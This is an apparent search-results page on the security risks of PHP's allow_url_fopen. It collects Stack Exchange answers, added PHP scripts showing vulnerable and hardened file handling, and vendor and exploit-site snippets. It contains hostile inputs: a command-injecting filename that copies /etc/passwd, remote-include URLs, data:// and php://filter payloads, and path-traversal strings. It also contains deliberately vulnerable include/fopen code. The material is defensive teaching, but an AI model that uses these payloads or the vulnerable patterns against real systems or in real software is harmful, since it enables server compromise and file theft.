Answer from Simon Woodside on Stack Exchange
Top answer
1 of 3
6

A sample attack scenario using allow_url_fopen that allows me to download your password file:

  1. Suppose your app allows me to provide a URL to a remote image, which you will download and use as my avatar image.
  2. I provide the following URL: "http://my.malicious.example.com/sbwoodside.jpg;cp%20/etc/passwd%20downloads/foo.jpg;"
  3. Your app uses allow_url_fopen to download the file and stores it as "sbwoodside.jpg;cp%20/etc/passwd%20downloads/passwords.txt;". I have now successfully injected a command into the filename.
  4. Your app wants to compress and resize my image, so you use ImageMagick on the command line with something like exec("magick convert -size 128x128 ".$filename." ".$filename.".128.jpg")
  5. What does exec actually execute? If you haven't sanitized the filename, then it executes the following on the shell:

magick convert -size 128x128 sbwoodside.jpg;cp /etc/passwd downloads/passwords.txt; sbwoodside.jpg;cp /etc/passwd downloads/passwords.txt;.128.jpg

Since ; is a command delimiter on the shell, that will be broken by the shell automatically into the following separate commands:

magick convert -size 128x128 sbwoodside.jpg
cp /etc/passwd downloads/passwords.txt
sbwoodside.jpg
cp /etc/passwd downloads/passwords.txt
.128.jpg

And now I just go to http://yourapp.com/downloads/passwords.txt and download your password file. Of course, I can do anything I want, since I'm executing commands as your web server on your system.
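The PHP script below is an added example, not code from the answer above or from any real application. It reconstructs the flow the answer describes under one stated assumption, that the app derives the stored filename from the path of the supplied URL and URL-decodes it, builds the same exec() string, splits it on ';' the way sh would, and then shows the hardened form: a server-chosen filename and an argv array for proc_open() (PHP 7.4+) instead of a shell string. The function names are illustrative, and the script only prints the command lines; it never runs ImageMagick.

```php
<?php
declare(strict_types=1);
// Added example, not part of the answer above. Reconstructs the avatar flow
// so the shell command that exec() would run is visible, then shows the
// hardened form. The assumption that the app names the stored file after the
// URL path, and all function names, are illustrative.

// Constructed input: the URL from the answer.
const ATTACKER_URL =
    'http://my.malicious.example.com/sbwoodside.jpg;cp%20/etc/passwd%20downloads/passwords.txt;';

// Vulnerable: the stored name is taken from the URL path and URL-decoded, so
// "%20" becomes a space and the name now carries a complete shell command.
function filenameFromUrl(string $url): string
{
    $path = (string) parse_url($url, PHP_URL_PATH);
    return urldecode(ltrim($path, '/'));
}

// Vulnerable: exactly the string the answer builds. exec() hands it to
// "sh -c", which treats ';' as a command separator.
function vulnerableCommand(string $filename): string
{
    return "magick convert -size 128x128 " . $filename . " " . $filename . ".128.jpg";
}

// Split on ';' the way sh would, to list what actually runs. Simplified: it
// ignores quoting, which the hostile filename does not use.
function shellCommands(string $commandLine): array
{
    $parts = array_map('trim', explode(';', $commandLine));
    return array_values(array_filter($parts, 'strlen'));
}

// Hardened, step 1: never reuse the remote name. The server picks the name,
// so nothing the attacker controls reaches the command line at all.
function serverChosenName(): string
{
    return bin2hex(random_bytes(16)) . '.jpg';
}

// Hardened, step 2: build argv instead of a shell string. proc_open() accepts
// an array on PHP 7.4+ and executes it without a shell, so ';', '|' and
// backticks inside $filename are just bytes of one argument.
function hardenedArgv(string $filename): array
{
    return ['magick', 'convert', '-size', '128x128', $filename, $filename . '.128.jpg'];
}

// If a shell string is unavoidable, escapeshellarg() wraps each value in
// single quotes. That stops the shell from splitting it, but ImageMagick still
// interprets the filename itself, so this is not a substitute for step 1.
function quotedCommand(string $filename): string
{
    return 'magick convert -size 128x128 ' . escapeshellarg($filename)
        . ' ' . escapeshellarg($filename . '.128.jpg');
}

$hostile = filenameFromUrl(ATTACKER_URL);
echo "Stored name:    $hostile\n";
echo "exec() runs:    " . vulnerableCommand($hostile) . "\n";
echo "sh splits into:\n";
foreach (shellCommands(vulnerableCommand($hostile)) as $cmd) {
    echo "  $cmd\n";
}
echo "Quoted:         " . quotedCommand($hostile) . "\n";
$safe = serverChosenName();
echo "Server name:    $safe\n";
echo "argv:           " . json_encode(hardenedArgv($safe)) . "\n";
```

Running it with `php example.php` prints the same exec() string the answer shows and the five commands sh would split it into. The argv form is the real fix: with no shell involved there is nothing to escape, and with a server-chosen name there is no attacker-controlled string on the command line in the first place.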

2 of 3
1

It depends on you! How did you design your application, and did you consider security during the whole software development life cycle?

Consider insecure code below that loads web pages according to request parameter (page):

<?php
// The value of ?page= is passed to include() unchanged.
include($_GET['page']);
?>

And now consider an attacker who includes malicious PHP code by using:

?page=http://example.com/badcode-php.txt

He can then bypass all security measures on your site and do anything (accessing local files, uploading other files, etc.).

So it's recommended to turn off allow_url_fopen and allow_url_include to minimize remote file execution attacks.
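As an added example (not part of the answer above), the PHP script below walks several attacker-controlled values of ?page= through a classifier that states what include() would do with each under allow_url_include On and Off, and then shows a loader that only includes files from a fixed allowlist. The probe values, the pages/ directory and the function names are constructed for illustration. The classifier follows PHP's documented wrapper behaviour: http://, ftp:// and data: need allow_url_include=On, which in turn needs allow_url_fopen=On, while php://filter and plain filesystem paths are gated by neither directive. The matching php.ini lines are allow_url_include = Off and allow_url_fopen = Off.

```php
<?php
declare(strict_types=1);
// Added example, not code from the answer. Shows what include($_GET['page'])
// would do with attacker-controlled values under different ini settings, and a
// loader that only includes allowlisted local files. Probe values, the pages/
// directory and the function names are constructed for illustration.

// Constructed values an attacker might send as ?page=
const PROBES = [
    'about',
    'http://example.com/badcode-php.txt',
    'ftp://example.com/badcode-php.txt',
    'data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==',   // base64 of "<?php phpinfo();"
    'php://filter/convert.base64-encode/resource=index.php',
    '../../../../etc/passwd',
];

// Wrappers that include() only honours when allow_url_include=On (which itself
// requires allow_url_fopen=On). php://filter and plain filesystem paths are not
// gated by either directive, so turning them off narrows the attack from RFI to
// LFI; it does not fix the include() itself.
const REMOTE_SCHEMES = ['http', 'https', 'ftp', 'ftps', 'data'];

function classifyInclude(string $page, bool $allowUrlInclude): string
{
    $scheme = strtolower((string) parse_url($page, PHP_URL_SCHEME));
    if (in_array($scheme, REMOTE_SCHEMES, true)) {
        return $allowUrlInclude
            ? 'RFI: remote code fetched and executed'
            : 'blocked by allow_url_include=Off';
    }
    if ($scheme === 'php') {
        return 'LFI via php:// wrapper (e.g. source disclosure through php://filter), not gated';
    }
    if (str_contains($page, '..')) {
        return 'LFI via path traversal, not gated';
    }
    return 'local include of ' . $page;
}

// Hardened loader: the request selects a key, never a path. The key is checked
// against a fixed list, the file is resolved with realpath(), and the result
// must still sit inside PAGE_DIR (realpath() resolves symlinks and "..").
const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'about', 'contact'];

function resolvePage(string $page): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $file = realpath(PAGE_DIR . '/' . $page . '.php');
    if ($base === false || $file === false
        || !str_starts_with($file, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $file;
}

function loadPage(string $requested): void
{
    $file = resolvePage($requested);
    if ($file === null) {
        http_response_code(404);
        return;
    }
    include $file;
}

// php.ini side (both are PHP_INI_SYSTEM, so they cannot be set from a script):
//   allow_url_include = Off   ; default since 5.2, deprecated in 7.4
//   allow_url_fopen   = Off   ; if nothing in the app needs remote streams
function configWarnings(): array
{
    $warnings = [];
    foreach (['allow_url_include', 'allow_url_fopen'] as $directive) {
        if (filter_var(ini_get($directive), FILTER_VALIDATE_BOOLEAN)) {
            $warnings[] = "$directive is On";
        }
    }
    return $warnings;
}

foreach ([true, false] as $on) {
    echo 'allow_url_include=' . ($on ? 'On' : 'Off') . "\n";
    foreach (PROBES as $p) {
        printf("  %-55s -> %s\n", $p, classifyInclude($p, $on));
    }
}
echo "resolvePage('about'): " . var_export(resolvePage('about'), true) . "\n";
echo "resolvePage('../../etc/passwd'): " . var_export(resolvePage('../../etc/passwd'), true) . "\n";
print_r(configWarnings());
```

The script needs PHP 8 for str_contains() and str_starts_with(). Note that the traversal and php://filter probes are reported as exploitable under both settings: disabling the two directives removes the remote variant, but only the allowlist loader removes user control over what include() opens.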

Acunetix
acunetix.com › vulnerabilities › web › php-allow_url_fopen-is-enabled
PHP allow_url_fopen Is Enabled - Vulnerabilities - Acunetix
When enabled, this directive allows data retrieval from remote locations (web site or FTP server). A large number of code injection vulnerabilities reported in PHP-based web applications are caused by the combination of enabling allow_url_fopen and bad input filtering.

Invicti
invicti.com › web-vulnerability-scanner › vulnerabilities › php-allowurlfopen-is-enabled
PHP allow_url_fopen Is Enabled
When allow_url_fopen is enabled, some of PHP's functions that usually expect file paths can be used to receive files over the network instead of the local file system. An attacker can abuse this behavior in order to make arbitrary server-side requests.

GitHub
github.com › lehongchau › Repo01 › issues › 8
Acunetix - PHP allow_url_fopen enabled · Issue #8 · lehongchau/Repo01
March 4, 2020 - Target URL: http://testphp.vulnweb.com/. Severity: High. Vulnerability Description: The PHP configuration directive allow_url_fopen is enabled. When enabled, this directive allows data retrieval from remote locations (web site or FTP server)....

Mannulinux
mannulinux.org › 2019 › 05 › exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html
Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction | Start With Linux | Mannu Linux
May 12, 2019 - We will bypass the Remote URL inclusion restriction and perform the exploitation of RFI even if the PHP environment is configured not to include files from remote HTTP/FTP URLs. PHP and SMB share file access: in the PHP configuration file, the "allow_url_include" wrapper is set to "Off" by default, which instructs PHP not to load remote HTTP or FTP URLs and hence prevents Remote File Inclusion attacks. But PHP does not block SMB URL loading even if "allow_url_include" and "allow_url_fopen" are both set to "Off".

Fortify
vulncat.fortify.com › en › detail
Software Security | PHP Misconfiguration: allow_url_fopen Enabled
Because the value of $file is controlled by a request parameter, an attacker could violate the programmer's assumptions by providing a URL to a remote file.
<?php
$file = fopen($_GET["file"], "r");
if (!$file) {
    // handle errors
}
while (!feof($file)) {
    $line = fgets($file, 1024);
    // operate ...

Beagle Security
beaglesecurity.com › blog › support › vulnerability › 2018 › 07 › 02 › PHP-allow_url_fopen-is-enabled.html
PHP allow_url_fopen is enabled
allow_url_fopen carries a risk of enabling remote file execution, access control bypass and information disclosure attacks if an attacker can inject a remote URI into the file function.

Web24
web24.com.au › tutorials › security-issues-allow_url_fopen
Security Issues with allow_url_fopen - Web24
October 21, 2016 - If allow_url_fopen is enabled, this system can be exploited by simply changing the value of the variable in the querystring:

Beagle Security
beaglesecurity.com › blog › vulnerability › allow-url-fopen-is-enabled.html
PHP allow_url_include is enabled
If the user inputs are not properly validated, the attacker can conduct a remote file inclusion attack on the server. If allow_url_include is enabled, an attacker can get data from remote locations using functions like fopen() and file_get_contents().

Null Byte
null-byte.wonderhowto.com › how-to › exploit-remote-file-inclusion-get-shell-0187006
How to Exploit Remote File Inclusion to Get a Shell :: Null Byte
September 7, 2018 - The allow_url_fopen option allows access to files on remote hosts or servers, while the allow_url_include option allows a remote file to utilize a URL rather than a local file path.

Invicti
invicti.com › web-application-vulnerabilities › php-allow-url-fopen-is-enabled
PHP allow_url_fopen Is Enabled - Web Application Vulnerabilities | Invicti
While enabled by default in PHP, this directive significantly increases the attack surface for remote file inclusion vulnerabilities when combined with insufficient input validation. Attackers can exploit this configuration to execute malicious code hosted on external servers.

Vaadata
vaadata.com › home › technical › what is rfi? remote file inclusion exploitations and security tips
What is RFI? Remote File Inclusion Exploits & Security Tips
September 3, 2024 - Similarly, the 'allow_url_fopen' option, which allows PHP functions such as 'fopen' to treat URLs as local files, should be disabled if it is not absolutely necessary. Managing updates is crucial to maintaining the security of web ...

Exploit-DB
exploit-db.com › exploits › 3657
MySpeach 3.0.7 - Local/Remote File Inclusion - PHP webapps Exploit
April 3, 2007 - Advisory :: MySpeach <= 3.0.7
Download link : http://www.graphiks.net/scripts-php/script-7-1-0.html
Official website : www.graphiks.net
Type : Chat without any database (only txt files)
Vuln. found : Remote/Local File inclusion (& Full Path Disclosure)
Conditions : Vuln #1 : PHP >= 5.0.0, register_globals = On, allow_url_fopen = On
             Vuln #2 : register_globals = On
Risk level : High

Blogger
poc-hack.blogspot.com › 2011 › 03 › how-to-exploit-lfi-local-file-include.html
POC HACK: How to exploit LFI (Local File Include) vulnerability on webpages
March 5, 2011 - The proper solution to this vulnerability is to modify the vulnerable code in order to prevent user control of file include directives. A PHP include vulnerability may be partially mitigated in some cases by using PHP's allow_url_fopen and ...

Exploit-DB
exploit-db.com › exploits › 48424
SimplePHPGal 0.7 - Remote File Inclusion - PHP webapps Exploit
May 5, 2020 - Only for (RFI): <?php ini_set('allow_url_fopen ', 'Off'); ?>
* We can use the strpos command to check that if the address is http, the file will not be included (it can only block RFI): <?php $strpos = strpos($_GET['url'],'http://'); if(!$strpos){ include($_GET['url']); } ?>
* Using str_replace we can clean the given address of the two characters "/" and ".".

Hacking Articles
hackingarticles.in › home › website hacking › comprehensive guide on remote file inclusion (rfi)
Comprehensive Guide on Remote File Inclusion (RFI)
July 31, 2020 - Would it still be vulnerable to RFI? The answer is "Yes", RFI vulnerabilities can be exploited through the SMB Server even if the "allow_url_include" or "allow_url_fopen" is set to Off.

Bobcares
bobcares.com › blog › enable-allow_url_fopen
enable allow_url_fopen : Easy way to access remote data !!
November 24, 2019 - In short, allow_url_fopen refers to a PHP directive which retrieves data from remote servers or websites. We can enable it by editing php.ini, .htaccess, or via the WHM interface and so on.

Medium
medium.com › @avihayeldad1 › when-phps-readfile-goes-rogue-exploiting-lfi-and-ssrf-in-a-saas-environment-ada2ea1ea6f4
When PHP's readfile() Goes Rogue: Exploiting LFI and SSRF in a SaaS Environment | Medium
June 15, 2025 - readfile() Supports URLs: Fun fact — readfile() can read remote URLs if allow_url_fopen is enabled, turning LFI into SSRF with a few keystrokes.